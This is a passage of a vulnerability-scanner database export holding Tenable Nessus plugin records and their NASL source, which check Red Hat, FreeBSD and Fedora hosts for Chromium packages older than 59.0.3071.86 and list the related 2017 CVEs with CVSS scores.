value:\"https://access.redhat.com/security/cve/cve-2017-5073\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5074\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5076\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5077\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5078\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5079\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5080\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5081\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5082\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5083\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5085\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2017-5086\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5080\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1399\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-59.0.3071.86-1.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-59.0.3071.86-1.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-59.0.3071.86-1.el6_9\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-59.0.3071.86-1.el6_9\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:28:04", "description": "Google Chrome releases reports :\n\n30 security fixes in this release\n\nPlease reference CVE/URL list for details", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-07T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (52f4b48b-4ac3-11e7-99aa-e8e0b747a45a)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_52F4B48B4AC311E799AAE8E0B747A45A.NASL", "href": "https://www.tenable.com/plugins/nessus/100646", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100646);\n script_version(\"3.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (52f4b48b-4ac3-11e7-99aa-e8e0b747a45a)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Google Chrome releases reports :\n\n30 security fixes in this release\n\nPlease reference CVE/URL list for details\");\n # https://chromereleases.googleblog.com/2017/06/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6dde93a4\");\n # https://vuxml.freebsd.org/freebsd/52f4b48b-4ac3-11e7-99aa-e8e0b747a45a.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8a682e0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<59.0.3071.86\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<59.0.3071.86\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:29:51", "description": "Chromium 59. Add smaller logo files. Fix lots of security bugs:\nSecurity fix for CVE-2017-5070, CVE-2017-5071, CVE-2017-5072, CVE-2017-5073, CVE-2017-5074, CVE-2017-5075, CVE-2017-5086, CVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079, CVE-2017-5080, CVE-2017-5081, CVE-2017-5082, CVE-2017-5083, CVE-2017-5085\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-13T00:00:00", "type": "nessus", "title": "Fedora 24 : 1:chromium-native_client (2017-b8d76bef4e)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:chromium-native_client", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-B8D76BEF4E.NASL", "href": "https://www.tenable.com/plugins/nessus/101510", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-b8d76bef4e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101510);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_xref(name:\"FEDORA\", value:\"2017-b8d76bef4e\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 24 : 1:chromium-native_client (2017-b8d76bef4e)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Chromium 59. Add smaller logo files. Fix lots of security bugs:\nSecurity fix for CVE-2017-5070, CVE-2017-5071, CVE-2017-5072,\nCVE-2017-5073, CVE-2017-5074, CVE-2017-5075, CVE-2017-5086,\nCVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079,\nCVE-2017-5080, CVE-2017-5081, CVE-2017-5082, CVE-2017-5083,\nCVE-2017-5085\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-b8d76bef4e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected 1:chromium-native_client package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:chromium-native_client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"chromium-native_client-59.0.3071.86-1.20170607gitaac1de2.fc24\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:chromium-native_client\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:27:24", "description": "The version of Google Chrome installed on the remote host is prior to 59.0.3071.86, and is affected by multiple vulnerabilities :\n\n - An unspecified type confusion flaw exists that may allow a context-dependent attacker to potentially execute arbitrary code. No further details have been provided.\n - An out-of-bounds read flaw. This may allow a context-dependent attacker to crash a process linked against the library or potentially disclose memory contents.\n - An unspecified flaw exists in Omnibox that may allow a context-dependent attacker to spoof the address. No further details have been provided.\n - A use-after-free error exists in print preview that may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code. \n - An unspecified flaw exists in CSP reporting that may allow a context-dependent attacker to disclose potentially sensitive information. No further details have been provided.\n - An unspecified flaw exists in Omnibox that may allow a context-dependent attacker to spoof the address. No further details have been provided. \n - An overflow condition exists that is triggered as certain input is not properly validated. This may allow a context-dependent attacker to cause a heap-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code.\n - An unspecified flaw exists in its mailto handling functionality. This may allow a context-dependent attacker to potentially inject arbitrary commands.\n - An unspecified flaw exists in Blink that may allow a context-dependent attacker to spoof the UI. No further details have been provided.\n - A use-after-free error exists in credit card autofill that may allow a context-dependent attacker to dereference already freed memory and have an unspecified impact.\n - An unspecified flaw exists that may allow a context-dependent attacker to bypass extension verification mechanisms. No further details have been provided.\n - An unspecified flaw exists in the credit card editor view related to insufficient hardening, which may allow a context-dependent attacker to potentially more easily disclose information related to credit cards.\n - An unspecified flaw exists in Blink which may allow a context-dependent attacker to spoof the UI. No further details have been provided.\n - A flaw exists on WebUI pages that is triggered as they improperly allow the execution of JavaScript. This may potentially allow a context-dependent attacker to execute JavaScript code.\n - An unspecified flaw exists that may allow a context-dependent attacker to have an unspecified impact. No further details have been provided.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-06-07T00:00:00", "type": "nessus", "title": "Google Chrome < 59.0.3071.86 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "700131.PASL", "href": "https://www.tenable.com/plugins/nnm/700131", "sourceData": "Binary data 700131.pasl", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:30:19", "description": "Chromium 59. Add smaller logo files. Fix lots of security bugs:\nSecurity fix for CVE-2017-5070, CVE-2017-5071, CVE-2017-5072, CVE-2017-5073, CVE-2017-5074, CVE-2017-5075, CVE-2017-5086, CVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079, CVE-2017-5080, CVE-2017-5081, CVE-2017-5082, CVE-2017-5083, CVE-2017-5085\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-07-17T00:00:00", "type": "nessus", "title": "Fedora 26 : 1:chromium-native_client (2017-c11d7ef69a)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5070", "CVE-2017-5071", "CVE-2017-5072", "CVE-2017-5073", "CVE-2017-5074", "CVE-2017-5075", "CVE-2017-5076", "CVE-2017-5077", "CVE-2017-5078", "CVE-2017-5079", "CVE-2017-5080", "CVE-2017-5081", "CVE-2017-5082", "CVE-2017-5083", "CVE-2017-5085", "CVE-2017-5086"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:chromium-native_client", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-C11D7EF69A.NASL", "href": "https://www.tenable.com/plugins/nessus/101715", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-c11d7ef69a.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101715);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2017-5070\",\n \"CVE-2017-5071\",\n \"CVE-2017-5072\",\n \"CVE-2017-5073\",\n \"CVE-2017-5074\",\n \"CVE-2017-5075\",\n \"CVE-2017-5076\",\n \"CVE-2017-5077\",\n \"CVE-2017-5078\",\n \"CVE-2017-5079\",\n \"CVE-2017-5080\",\n \"CVE-2017-5081\",\n \"CVE-2017-5082\",\n \"CVE-2017-5083\",\n \"CVE-2017-5085\",\n \"CVE-2017-5086\"\n );\n script_xref(name:\"FEDORA\", value:\"2017-c11d7ef69a\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 26 : 1:chromium-native_client (2017-c11d7ef69a)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Chromium 59. Add smaller logo files. Fix lots of security bugs:\nSecurity fix for CVE-2017-5070, CVE-2017-5071, CVE-2017-5072,\nCVE-2017-5073, CVE-2017-5074, CVE-2017-5075, CVE-2017-5086,\nCVE-2017-5076, CVE-2017-5077, CVE-2017-5078, CVE-2017-5079,\nCVE-2017-5080, CVE-2017-5081, CVE-2017-5082, CVE-2017-5083,\nCVE-2017-5085\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-c11d7ef69a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected 1:chromium-native_client package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:chromium-native_client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local 